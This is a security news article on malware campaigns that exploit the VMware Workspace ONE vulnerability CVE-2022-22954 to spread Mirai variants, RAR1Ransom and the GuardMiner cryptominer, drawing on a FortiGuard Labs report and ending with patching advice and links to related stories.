Researchers at FortiGuard Labs noticed multiple malware campaigns targeting the VMware vulnerability to deploy cryptocurrency miners and ransomware on affected machines.
The critical vulnerability is tracked as CVE-2022-22954 (CVSS score: 9.8), a remote code execution vulnerability that causes server-side template injection. VMware patched this vulnerability, yet came under active exploitation in the wild.
An attacker can trigger the vulnerability to inject a payload and achieve remote code execution on VMware Workspace ONE Access and Identity Manager.
“Most of the payloads focus on probing a victim’s sensitive data, for example, passwords, hosts file, etc”, Fortinet FortiGuard Labs.
“They had the intention of deploying Mirai targeting exposed networking devices running Linux, RAR1ransom that leverages legitimate WinRAR to deploy encryption and GuardMiner that is a variant of xmrig used to “mine” Monero”.
Researchers say this variant’s work is to deploy DoS and launch a brute force attack like most Mirai botnets.
Reports say the distribution of RAR1Ransom and GuardMiner is achieved by means of a PowerShell or a shell script depending on the operating system.
RAR1ransom is prominent for leveraging the legitimate WinRAR utility to lock files in password-protected archives.
The PowerShell script downloads the following files from a Cloudflare IPFS gateway:
RAR1Ransom is a ransomware tool that abuses WinRAR to compress the victim’s files and lock them with a password. GuardMiner is a cross-platform mining Trojan, which has been active since 2020.
RAR1Ransom targets a compromised victim’s file with particular extensions.
“We can tell the attacker intends to utilize a victim’s resources as much as possible, not only to install RAR1Ransom for extortion, but also to spread GuardMiner to collect cryptocurrency”, Fortinet FortiGuard Labs
Therefore, users are advised to keep their systems updated and patched and be aware of any suspicious processes in the environment.
“These Mirai variants, RAR1Ransom, and GuardMiner are not extremely complicated samples, but their methods are always changing and evolving”, concludes the report.
Managed DDoS Attack Protection for Applications – Download Free Guide
A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…
A threat actor known as #LongNight has reportedly put up for sale remote code execution…
Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…
Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…
The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…
Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…